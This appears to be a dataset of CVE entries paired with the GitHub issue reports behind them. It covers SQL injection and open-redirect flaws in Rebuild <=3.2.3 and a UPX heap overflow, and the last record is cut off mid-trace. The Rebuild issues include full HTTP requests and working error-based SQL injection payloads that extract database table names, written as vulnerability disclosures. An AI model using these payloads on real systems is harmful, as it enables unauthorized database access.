[ "getrebuild", "rebuild" ]
### ็‰ˆๆœฌ / Version <=3.2.3 ### ไป€ไนˆ้—ฎ้ข˜ / What's the problem SQL injection vulnerability exists in the/project/tasks/list interface of the rebuild system. ๅœจrebuild็ณป็ปŸ็š„/project/tasks/listๆŽฅๅฃไธญๅญ˜ๅœจSQLๆณจๅ…ฅๆผๆดžใ€‚ ### ๅฆ‚ไฝ•ๅค็Žฐๆญค้—ฎ้ข˜ / How to reproduce this problem #### ๅŠŸ่ƒฝ็‚น / Function points ![sql2_4](https://user-images.githubusercontent.com/97539349/226191765-cd71e6df-01b7-44cc-817b-3aea1ea4611b.png) #### ่ฏทๆฑ‚ไฟกๆฏ / Request message: ``` POST /project/tasks/list?plan=051-0186e077f3840002&sort=&search=1&pageNo=1&pageSize=40&project=050-0186e077f3840001 HTTP/1.1 Host: 192.168.0.102:18080 Content-Length: 0 X-AuthToken: Accept: */* X-CsrfToken: X-Requested-With: XMLHttpRequest X-Client: RB/WEB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: text/plain;charset=utf-8 Origin: http://192.168.0.102:18080 Referer: http://192.168.0.102:18080/project/050-0186e077f3840001/tasks Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; GuideShowNaverTime=true; rb.sidebarCollapsed=false; JSESSIONID=CD3ABF26F95BD016C875973BC0F24154; _ga_CC8EXS9BLD=GS1.1.1679235290.8.1.1679235510.0.0.0 Connection: close ``` ๆ”ปๅ‡ป่ฝฝ่ท / payload:`%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)--+` #### ๆผๆดžๅค็Žฐ / Vulnerability recurrence ![sql2_5](https://user-images.githubusercontent.com/97539349/226191836-f1c13bd4-1b82-4582-b668-33ad3a3003ca.png) There you can see it! ### ็ณป็ปŸ็Žฏๅขƒ (ๆ“ไฝœ็ณป็ปŸ/MySQL็‰ˆๆœฌ/ๆต่งˆๅ™จ็ญ‰) / System environment (OS/MySQL/Browser etc) Mysql 5.7.26 Windows JDK1.8.0_341 Chrome ### ่ฏดๆ˜Ž / Suggested description sql injection vulnerability exists in rebuild <=3.2.3 ๅœจrebuild็ณป็ปŸๅฐไบŽ3.2.3็‰ˆๆœฌไธญๅญ˜ๅœจSQLๆณจๅ…ฅๆผๆดž Failed to legally check parameters, resulting in SQL injection vulnerabilities. ๆœช่ƒฝๅˆๆณ•ๆฃ€ๆŸฅๅ‚ๆ•ฐไปŽ่€Œๅฏผ่‡ดsqlๆณจๅ…ฅๆผๆดž. #### ๆผๆดž็ฑปๅž‹ / Vulnerability Type SQLi #### ไบงๅ“ไพ›ๅบ”ๅ•† / Vendor of Product https://github.com/getrebuild/rebuild #### ๅ—ๅฝฑๅ“็š„ไบงๅ“ไปฃ็ ๅบ“ / Affected Product Code Base <=3.2.3 #### ๅ—ๅฝฑๅ“็ป„ไปถ / Affected Component /project/tasks/list #### ๆ”ปๅ‡ปๆ–นๅผ / Attack Type Remote ### ๆผๆดžๆˆๅ›  / Cause of vulnerability In the `com.build.web.project.ProjectTaskController#taskList()` method, some SQL statements were customized and eventually spliced into the query statement. ๅœจ`com.rebuild.web.project.ProjectTaskController#taskList()`ๆ–นๆณ•ไธญ๏ผŒ่‡ชๅฎšไน‰ไบ†้ƒจๅˆ†SQL่ฏญๅฅ๏ผŒๅนถไธ”ๆœ€็ปˆๅฐ†่ฏฅ้ƒจๅˆ†SQL่ฏญๅฅๆ‹ผๆŽฅ่‡ณๆŸฅ่ฏข่ฏญๅฅไธญใ€‚ ![sql2_1](https://user-images.githubusercontent.com/97539349/226192062-99ae2d43-36ea-4b2d-9753-a7d4f3e0dc21.png) Although the 'StringsEscapeUtils. EscapeSql()' method is used here to process user input, there is a bypass. ่™ฝ็„ถๆญคๅค„ไฝฟ็”จไบ†`StringsEscapeUtils.escapeSql()`ๆ–นๆณ•ๅฏน็”จๆˆท่พ“ๅ…ฅๅšไบ†ๅค„็†๏ผŒไฝ†ๅญ˜ๅœจ็ป•่ฟ‡ใ€‚ ![sql2_2](https://user-images.githubusercontent.com/97539349/226192072-3cfa46b4-b3b9-4096-9771-42dcab320aca.png) Finally, in line 122 of `com.rebuild.web.project.ProjectTaskController`, user input was brought into the query statement, causing a SQL injection vulnerability. ๆœ€็ปˆๅœจcom.rebuild.web.project.ProjectTaskController็š„็ฌฌ122่กŒ๏ผŒๅฐ†็”จๆˆท่พ“ๅ…ฅๅธฆๅ…ฅๅˆฐๆŸฅ่ฏข่ฏญๅฅไธญ๏ผŒ้€ ๆˆSQLๆณจๅ…ฅๆผๆดžใ€‚ ![sql2_3](https://user-images.githubusercontent.com/97539349/226192085-dfddd1a9-3b9a-40de-9a54-a5383758389f.png) The end,thanks!
SQL injection vulnerability exists in the /project/tasks/list interface of the rebuild system
https://api.github.com/repos/getrebuild/rebuild/issues/597/comments
1
2023-03-19T16:56:55Z
2023-03-20T12:01:53Z
https://github.com/getrebuild/rebuild/issues/597
1,631,026,106
597
4,879
CVE-2023-1612
2023-03-23T21:15:19.510
A vulnerability, which was classified as critical, was found in Rebuild up to 3.2.3. This affects an unknown part of the file /files/list-file. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-223743.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/getrebuild/rebuild/issues/598" }, { "source": "cna@vuldb.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223743" }, { "source": "cna@vuldb.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://vuldb.com/?id.223743" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/getrebuild/rebuild/issues/598" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223743" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://vuldb.com/?id.223743" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*", "matchCriteriaId": "3055AC72-F415-4504-952E-1E891C67D61C", "versionEndExcluding": null, "versionEndIncluding": "3.2.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/getrebuild/rebuild/issues/598
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "getrebuild", "rebuild" ]
### ็‰ˆๆœฌ / Version <=3.2.3 ### ไป€ไนˆ้—ฎ้ข˜ / What's the problem ๅœจrebuild็ณป็ปŸ็š„/files/list-fileๆŽฅๅฃไธญๅญ˜ๅœจSQLๆณจๅ…ฅๆผๆดž There is a SQL injection vulnerability in the /files/list-file interface of the rebuild system. ### ๅฆ‚ไฝ•ๅค็Žฐๆญค้—ฎ้ข˜ / How to reproduce this problem #### ๅŠŸ่ƒฝ็‚น / Function points ![sql3_3](https://user-images.githubusercontent.com/97539349/226192235-37cc15b9-ef92-4dd1-bdef-5d873c0c9363.png) #### ่ฏทๆฑ‚ไฟกๆฏ / Request message: ``` GET /files/list-file?entry=1&sort=&q=1&pageNo=1&pageSize=40&_=1679238611579 HTTP/1.1 Host: 192.168.0.102:18080 X-AuthToken: Accept: */* X-CsrfToken: X-Requested-With: XMLHttpRequest X-Client: RB/WEB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: text/plain;charset=utf-8 Referer: http://192.168.0.102:18080/files/home Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: rb.lastFilesPath=attachment; _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; GuideShowNaverTime=true; rb.sidebarCollapsed=false; JSESSIONID=CD3ABF26F95BD016C875973BC0F24154; _ga_CC8EXS9BLD=GS1.1.1679238611.9.1.1679238613.0.0.0 Connection: close ``` #### ๆ”ปๅ‡ป่ฝฝ่ท / payload: `%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)+and%201%20=%20?%20--+` #### ๆผๆดžๅค็Žฐ / Vulnerability recurrence ![sql3_4](https://user-images.githubusercontent.com/97539349/226192318-c36948ac-e24d-4e87-b02a-5a76a69b6784.png) ### ็ณป็ปŸ็Žฏๅขƒ (ๆ“ไฝœ็ณป็ปŸ/MySQL็‰ˆๆœฌ/ๆต่งˆๅ™จ็ญ‰) / System environment (OS/MySQL/Browser etc) Mysql 5.7.26 Windows JDK1.8.0_341 Chrome ### ่ฏดๆ˜Ž / Suggested description sql injection vulnerability exists in rebuild <=3.2.3 ๅœจrebuild็ณป็ปŸๅฐไบŽ3.2.3็‰ˆๆœฌไธญๅญ˜ๅœจSQLๆณจๅ…ฅๆผๆดž Failed to legally check parameters, resulting in SQL injection vulnerabilities. ๆœช่ƒฝๅˆๆณ•ๆฃ€ๆŸฅๅ‚ๆ•ฐไปŽ่€Œๅฏผ่‡ดsqlๆณจๅ…ฅๆผๆดž. #### ๆผๆดž็ฑปๅž‹ / Vulnerability Type SQLi #### ไบงๅ“ไพ›ๅบ”ๅ•† / Vendor of Product https://github.com/getrebuild/rebuild #### ๅ—ๅฝฑๅ“็š„ไบงๅ“ไปฃ็ ๅบ“ / Affected Product Code Base <=3.2.3 #### ๅ—ๅฝฑๅ“็ป„ไปถ / Affected Component /files/list-file #### ๆ”ปๅ‡ปๆ–นๅผ / Attack Type Remote ### ๆผๆดžๆˆๅ›  / Cause of vulnerability In the `com.rebuild.web.files.FileListController#listFile()` method, obtain the user's input and splice it into SqlWhere ๅœจ`com.rebuild.web.files.FileListController#listFile()`ๆ–นๆณ•ไธญ๏ผŒ่Žทๅ–็”จๆˆท็š„่พ“ๅ…ฅ๏ผŒๅนถๆ‹ผๆŽฅ่‡ณSqlWhereไธญ ![sql3_1](https://user-images.githubusercontent.com/97539349/226192425-efe54aef-bfac-4fc7-9ad3-416bc1043149.png) The `StringEscapeUtils.escapeSql` method is used here to process user input, which poses a risk of being bypassed. ๆญคๅค„ไฝฟ็”จ`StringEscapeUtils.escapeSql`ๆ–นๆณ•ๅฏน็”จๆˆท่พ“ๅ…ฅ่ฟ›่กŒๅค„็†๏ผŒๆญค็งๆ–นๆณ•ๅญ˜ๅœจ็ป•่ฟ‡็š„้ฃŽ้™ฉใ€‚ Then insert SqlWhere into the final query statement and bring it into the query. ้šๅŽๅฐ†SqlWhereๆ’ๅ…ฅๅˆฐๆœ€็ปˆ็š„ๆŸฅ่ฏข่ฏญๅฅไธญ๏ผŒๅนถๅธฆๅ…ฅๅˆฐๆŸฅ่ฏขไธญใ€‚ ![sql3_2](https://user-images.githubusercontent.com/97539349/226192442-b790ef0a-c2a8-4225-932e-0c0daf98f61b.png) An attacker can implement a SQL injection vulnerability when passing in malicious SQL statements. ๅฝ“ๆ”ปๅ‡ป่€…ไผ ๅ…ฅๆถๆ„็š„sql่ฏญๅฅๆ—ถ๏ผŒๅณๅฏๅฎž็ŽฐSQLๆณจๅ…ฅๆผๆดžใ€‚ The end,thanks!
SQL injection vulnerability exists in the /files/list-file interface of the rebuild system
https://api.github.com/repos/getrebuild/rebuild/issues/598/comments
1
2023-03-19T17:03:47Z
2023-03-20T12:01:50Z
https://github.com/getrebuild/rebuild/issues/598
1,631,028,547
598
4,880
CVE-2023-1613
2023-03-23T21:15:19.597
A vulnerability has been found in Rebuild up to 3.2.3 and classified as problematic. This vulnerability affects unknown code of the file /feeds/post/publish. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-223744.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/getrebuild/rebuild/issues/596" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223744" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223744" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/getrebuild/rebuild/issues/596" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223744" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223744" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*", "matchCriteriaId": "3055AC72-F415-4504-952E-1E891C67D61C", "versionEndExcluding": null, "versionEndIncluding": "3.2.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/getrebuild/rebuild/issues/596
[ "Third Party Advisory" ]
github.com
[ "getrebuild", "rebuild" ]
### ็‰ˆๆœฌ / Version <=3.2.3 ### ไป€ไนˆ้—ฎ้ข˜ / What's the problem A URL redirection vulnerability exists in the/file/img/* * interface of the REBUILD system. ๅœจREBUILD็ณป็ปŸ็š„/filex/img/**ๆŽฅๅฃไธญๅญ˜ๅœจURL้‡ๅฎšๅ‘ๆผๆดž ### ๅฆ‚ไฝ•ๅค็Žฐๆญค้—ฎ้ข˜ / How to reproduce this problem #### ๅŠŸ่ƒฝ็‚น / Function points ![urlRedirection1_3](https://user-images.githubusercontent.com/97539349/226191288-197e198a-89c9-4422-a29c-fa20292444f3.png) Create a new dynamic in the dynamic function (need to insert an image), click Publish, obtain the request information from the `/feeds/post/publish` interface, and change the content in images. ๅœจๅŠจๆ€ๅŠŸ่ƒฝๅค„ๅˆ›ๅปบๆ–ฐ็š„ๅŠจๆ€๏ผˆ้œ€ๆ’ๅ…ฅๅ›พ็‰‡๏ผ‰๏ผŒ็‚นๅ‡ปๅ‘ๅธƒ๏ผŒ่Žทๅ–/feeds/post/publishๆŽฅๅฃ็š„่ฏทๆฑ‚ไฟกๆฏ๏ผŒๆ›ดๆ”นimagesๅค„็š„ๅ†…ๅฎนใ€‚ ``` POST /feeds/post/publish HTTP/1.1 Host: 192.168.0.102:18080 Content-Length: 112 X-AuthToken: Accept: */* X-CsrfToken: X-Requested-With: XMLHttpRequest X-Client: RB/WEB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Origin: http://192.168.0.102:18080 Referer: http://192.168.0.102:18080/feeds/home Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0 Connection: close {"content":"333","images":["http://www.baidu.com"],"scope":"ALL","type":1,"metadata":{"entity":"Feeds"}} ``` ![urlRedirection1_4](https://user-images.githubusercontent.com/97539349/226191310-dc4526f2-2bd8-4d84-8dc1-eb4436d255d8.png) View the front-end page and discover that `http://www.baidu.com` Has been successfully joined. ๆŸฅ็œ‹ๅ‰็ซฏ้กต้ข๏ผŒๅ‘็Žฐ`http://www.baidu.com`ๅทฒ่ขซๆˆๅŠŸๅŠ ๅ…ฅใ€‚ ``` GET /filex/img/http://www.baidu.com?imageView2/2/w/300/interlace/1/q/100 HTTP/1.1 Host: 192.168.0.102:18080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Referer: http://192.168.0.102:18080/feeds/home Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0 Connection: close ``` ![urlRedirection1_5](https://user-images.githubusercontent.com/97539349/226191332-f51b0e2a-020a-450d-9182-bd808d05e07f.png) Click Download File to successfully redirect to`http://www.baidu.com` ็‚นๅ‡ปไธ‹่ฝฝๆ–‡ไปถ๏ผŒ่ƒฝๅคŸๆˆๅŠŸ่ทณ่ฝฌ่‡ณ`http://www.baidu.com` ![urlRedirection1_7](https://user-images.githubusercontent.com/97539349/226191366-95c0d40e-0f3b-4a86-aa51-bdb33391d88a.png) ### ็ณป็ปŸ็Žฏๅขƒ (ๆ“ไฝœ็ณป็ปŸ/MySQL็‰ˆๆœฌ/ๆต่งˆๅ™จ็ญ‰) / System environment (OS/MySQL/Browser etc) Mysql 5.7.26 Windows JDK1.8.0_341 Chrome ### ่ฏดๆ˜Ž / Suggested description URL Redirection vulnerability exists in rebuild <=3.2.3 rebuild็ณป็ปŸไธญๅญ˜ๅœจURL้‡ๅฎšๅ‘ๆผๆดž<=3.2.3 #### ๆผๆดž็ฑปๅž‹ / Vulnerability Type URL Redirection #### ไบงๅ“ไพ›ๅบ”ๅ•† / Vendor of Product https://github.com/getrebuild/rebuild #### ๅ—ๅฝฑๅ“็š„ไบงๅ“ไปฃ็ ๅบ“ / Affected Product Code Base <=3.2.3 #### ๅ—ๅฝฑๅ“็ป„ไปถ / Affected Component /feeds/post/publish /filex/img/** #### ๆ”ปๅ‡ปๆ–นๅผ / Attack Type Remote ### ๆผๆดžๆˆๅ›  / Cause of vulnerability In the `com.build.web.commons.FileDownloader#viewImg()` method, obtain the path of the image and obtain it based on the path of the image,Then redirect based on the obtained content. ๅœจcom.rebuild.web.commons.FileDownloader#viewImg()ๆ–นๆณ•ไธญ๏ผŒๅฏนๅ›พ็‰‡็š„่ทฏๅพ„่ฟ›่กŒ่Žทๅ–๏ผŒๆ นๆฎๅ›พ็‰‡็š„่ทฏๅพ„่ฟ›่กŒ่Žทๅ–๏ผŒ็„ถๅŽๆ นๆฎ่Žทๅ–ๅˆฐ็š„ๅ†…ๅฎน่ฟ›่กŒ้‡ๅฎšๅ‘ใ€‚ ![urlRedirection1_1](https://user-images.githubusercontent.com/97539349/226191560-8282f1f5-8ab9-4189-b89e-88c3e380f771.png) The path of the image is passed in by the `com.rebuild.web.feeds.FeedsPostController#publish` method ๅ›พ็‰‡็š„่ทฏๅพ„็”ฑcom.rebuild.web.feeds.FeedsPostController#publishๆ–นๆณ•ไผ ๅ…ฅ ![urlRedirection1_2](https://user-images.githubusercontent.com/97539349/226191589-b8dda022-16d7-4301-99d5-ed810b16839a.png) An attacker can implement a URL redirection vulnerability when a user clicks to download a file by changing the image path information to a malicious website address. ๆ”ปๅ‡ป่€…่ƒฝๅคŸ้€š่ฟ‡ๅฐ†ๅ›พ็‰‡่ทฏๅพ„ไฟกๆฏๆ›ดๆ”นไธบๆถๆ„็ฝ‘็ซ™ๅœฐๅ€๏ผŒๅœจ็”จๆˆท็‚นๅ‡ปไธ‹่ฝฝๆ–‡ไปถๆ—ถๅฎž็ŽฐURL้‡ๅฎšๅ‘ๆผๆดžใ€‚ The end,thanks!
A URL redirection vulnerability exists in the/file/img/* * interface of the REBUILD system
https://api.github.com/repos/getrebuild/rebuild/issues/596/comments
2
2023-03-19T16:48:50Z
2023-03-23T14:50:29Z
https://github.com/getrebuild/rebuild/issues/596
1,631,023,520
596
4,881
CVE-2021-43311
2023-03-24T20:15:08.223
A heap-based buffer overflow was discovered in upx, during the generic pointer 'p' points to an inaccessible address in func get_le32(). The problem is essentially caused in PackLinuxElf32::elf_lookup() at p_lx_elf.cpp:5382.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/upx/upx/issues/380" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/upx/upx/issues/380" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA", "versionEndExcluding": "4.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/upx/upx/issues/380
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "upx", "upx" ]
## What's the problem (or question)? Multi heap-based buffer overflows were discovered in upx, during the genric pointer 'p' points to an inaccessible address in func get_le32(). The issue can be triggered by different places, which can cause a denial of service. The issue is diff from [issue365](https://github.com/upx/upx/issues/365) ASAN reports: ```bash ==112024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00001f3b1 at pc 0x0000005292cb bp 0x7fffc3995640 sp 0x7fffc3995630 READ of size 4 at 0x61d00001f3b1 thread T0 #0 0x5292ca in get_le32(void const*) /home/test/Desktop/EVAULATION/upx/src/bele.h:164 #1 0x5292ca in N_BELE_RTP::LEPolicy::get32(void const*) const /home/test/Desktop/EVAULATION/upx/src/bele_policy.h:192 #2 0x4589c1 in Packer::get_te32(void const*) const /home/test/Desktop/EVAULATION/upx/src/packer.h:296 #3 0x4589c1 in PackLinuxElf32::elf_lookup(char const*) const /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:5382 #4 0x463d30 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:315 #5 0x464e96 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.h:395 #6 0x464e96 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4800 #7 0x464e96 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4817 #8 0x464e96 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4828 #9 0x4f337a in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:190 #10 0x4f50f9 in PackMaster::getUnpacker(InputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248 #11 0x4f521f in PackMaster::unpack(OutputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266 #12 0x52a1e6 in do_one_file(char const*, char*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160 #13 0x52a69e in do_files(int, int, char**) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271 #14 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538 #15 0x7efc08e6182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #16 0x404828 in _start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828) 0x61d00001f3b1 is located 189 bytes to the right of 2164-byte region [0x61d00001ea80,0x61d00001f2f4) allocated by thread T0 here: #0 0x7efc09a55602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x42732a in MemBuffer::alloc(unsigned long long) /home/test/Desktop/EVAULATION/upx/src/mem.cpp:194 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/EVAULATION/upx/src/bele.h:164 get_le32(void const*) Shadow bytes around the buggy address: 0x0c3a7fffbe20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3a7fffbe30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3a7fffbe40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3a7fffbe50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 fa 0x0c3a7fffbe60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c3a7fffbe70: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa 0x0c3a7fffbe80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fffbe90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fffbea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fffbeb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fffbec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==112024==ABORTING ``` Debug ```bash Program received signal SIGSEGV, Segmentation fault. 0x000000000066f8f8 in get_le32 